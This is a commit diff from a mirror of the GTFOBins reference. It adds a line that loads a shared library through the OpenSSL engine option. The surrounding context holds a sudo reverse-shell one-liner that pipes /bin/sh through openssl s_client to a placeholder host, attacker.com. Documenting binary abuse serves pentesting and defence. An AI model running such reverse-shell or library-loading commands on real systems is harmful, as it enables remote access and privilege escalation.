mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add library load section to OpenSSL
This commit is contained in:
parent
3310197fbc
commit
041110d54d
@ -79,4 +79,6 @@ functions:
|
|||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
|
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
|
||||||
|
library-load:
|
||||||
|
- code: openssl req -engine ./lib.so
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user